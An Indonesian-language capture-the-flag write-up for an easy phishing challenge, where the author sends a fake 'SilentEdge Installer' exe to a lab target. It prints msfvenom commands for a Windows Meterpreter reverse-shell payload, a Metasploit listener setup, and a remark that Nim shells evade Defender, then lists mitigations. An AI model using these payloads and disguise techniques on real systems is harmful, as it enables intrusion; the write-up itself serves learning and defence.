SHADOW PHISHING
Deskripsi
Category: Phishing/Red Teaming || Level: EASY
📌Deskripsi Tantangan
Dalam tantangan ini, diberikan akses ke akun email milik ShadowByte, salah satu agen kepercayaan Cipher. Melalui pesan yang dikirimkan oleh Cipher, kita mengetahui bahwa Cipher sedang bergerak ke fase 2 dan membutuhkan file installer SilentEdge yang dapat berjalan dengan baik di Windows 10 x64. Tugasnya adalah mengirimkan file exe yang tampaknya sah, namun di dalamnya berisi payload reverse shell yang memungkinkan untuk mendapatkan akses ke sistem target.
Informasi yang diberikan:
Username: shadowbyte@darknetmail.corp
Password: ShadowIsTheBest
Webmail: 10.10.86.42
Pesan dari Cipher:
ShadowByte, We’re moving to phase 2. I need the latest build of the SilentEdge Installer prepped ASAP. Make sure the exe runs clean on Win10 x64. Upload to the usual dead drop, and send it here. Keep this between us.
-Cipher-
Dari pesan ini, terlihat bahwa ada sebuah file eksekusi (.exe) yang harus dikirimkan ke dead drop. Ini memberikan indikasi bahwa kita dapat menyusup ke dalam sistem dengan teknik phishing atau reverse shell menggunakan file yang tampak seperti SilentEdge Installer.
📌Teori
Pada tantangan ini, kita akan mengeksploitasi celah reverse shell yang sering digunakan oleh penyerang untuk mendapatkan akses ke sistem korban.
Reverse shell adalah teknik di mana sistem korban membuat koneksi keluar ke penyerang, yang memungkinkan penyerang mengendalikan sistem korban dari jarak jauh. Teknik ini sering kali digunakan dalam serangan phishing, di mana penyerang mengirimkan file atau instruksi yang tampaknya sah tetapi sebenarnya berisi kode berbahaya yang mengeksekusi shell pada mesin target.
Phishing adalah teknik rekayasa sosial yang digunakan untuk menipu korban agar mengungkapkan informasi sensitif, mengunduh malware, atau menjalankan perintah berbahaya. Dalam konteks ini, reverse shell digunakan untuk memanfaatkan sistem korban dan mendapatkan akses tidak sah.
📌 Eksploitasi
Untuk mengeksploitasi sistem target, saya menggunakan msfvenom untuk membuat payload reverse shell dan Metasploit Framework untuk mendengarkan koneksi dari payload yang sudah saya buat.
1. Membuat Payload dengan msfvenom
Langkah pertama adalah menggunakan msfvenom untuk membuat payload reverse shell yang dapat berjalan di Windows. Payload ini akan membuat sistem korban menghubungi server kita setelah dijalankan.
*Anda juga bisa menggunakan Nim Reverse Shell*
Perintah yang digunakan untuk membuat payload adalah:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -f exe > <nama_file>.exe
Setelah menjalankan perintah ini, kita akan mendapatkan file payload.exe yang dapat dikirimkan ke target.
2. Menjalankan Listener dengan Metasploit
Setelah memiliki file payload.exe, langkah berikutnya adalah menyiapkan listener dengan Metasploit Framework untuk menunggu koneksi dari sistem target.
Menjalankan Metasploit dengan perintah berikut, kemudian menggunakan modul exploit/multi/handler yang dapat menangani payload yang dikirimkan:
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <ip>
set LPORT <port>
run
3. Mengirimkan Payload ke Target
Setelah listener berjalan, saya mengirimkan file payload ke target melalui dead drop yang disebutkan dalam email dari Cipher. Setelah file tersebut dijalankan oleh target, koneksi reverse shell akan terbentuk.
Begitu koneksi berhasil, saya dapat mengendalikan sistem korban menggunakan Meterpreter. Saya kemudian menavigasi ke desktop Administrator dan mencari file flag.txt:
> cd C:\Users\Administrator\Desktop
> type flag.txt
Hasilnya, flag ditemukan ^^
Final Flag🎯
Ouput Pesan yang didekripsi:
THM{3m41l_ph1sh1ng_1s_3z}
📌Kelemahan
Kerentanannya terletak pada kurangnya perlindungan terhadap file exe yang dapat dieksekusi, serta kurangnya kontrol terhadap file yang dapat diunggah dan dijalankan oleh pengguna. Sistem ini juga tidak memiliki deteksi yang memadai terhadap perintah-perintah berbahaya yang dijalankan melalui reverse shell.
Tidak ada Validasi File: Sistem tidak memvalidasi atau memfilter file yang diunggah, memungkinkan file berbahaya seperti reverse shell untuk dijalankan.
Tidak ada Proteksi dari Antivirus atau EDR: Tanpa proteksi yang memadai, seperti penggunaan Windows Defender yang tidak dapat mendeteksi reverse shell berbasis Nim, penyerang bisa lolos dari deteksi.
Lemahnya Keamanan Email: Pesan phishing dari Cipher tidak memicu alarm di sistem keamanan email, yang bisa mencegah file berbahaya diunggah atau dibuka oleh ShadowByte.
📌Kesimpulan
Tantangan ini menunjukkan bagaimana phishing dan reverse shell dapat digunakan untuk mendapatkan akses ke sistem korban. Dengan memahami teknik ini, kita bisa lebih waspada terhadap serangan yang memanfaatkan malicious attachments atau social engineering.
📌Mitigasi
Filter Lampiran Email: Terapkan filter ketat pada lampiran email dan cek apakah file tersebut mengandung potensi bahaya, seperti ekstensi .exe, .bat, atau file lain yang dapat dieksekusi.
Gunakan Antivirus dan Endpoint Detection: Pastikan sistem dilindungi dengan perangkat lunak antivirus yang kuat dan Endpoint Detection and Response (EDR) untuk mendeteksi aktivitas berbahaya.
(Umum) Pendidikan Pengguna: Melakukan pelatihan kepada pengguna untuk mengenali tanda-tanda phishing dan file yang mencurigakan dalam email.
Dengan mitigasi yang tepat, dapat mengurangi risiko dari serangan berbasis phishing dan reverse shell ini.
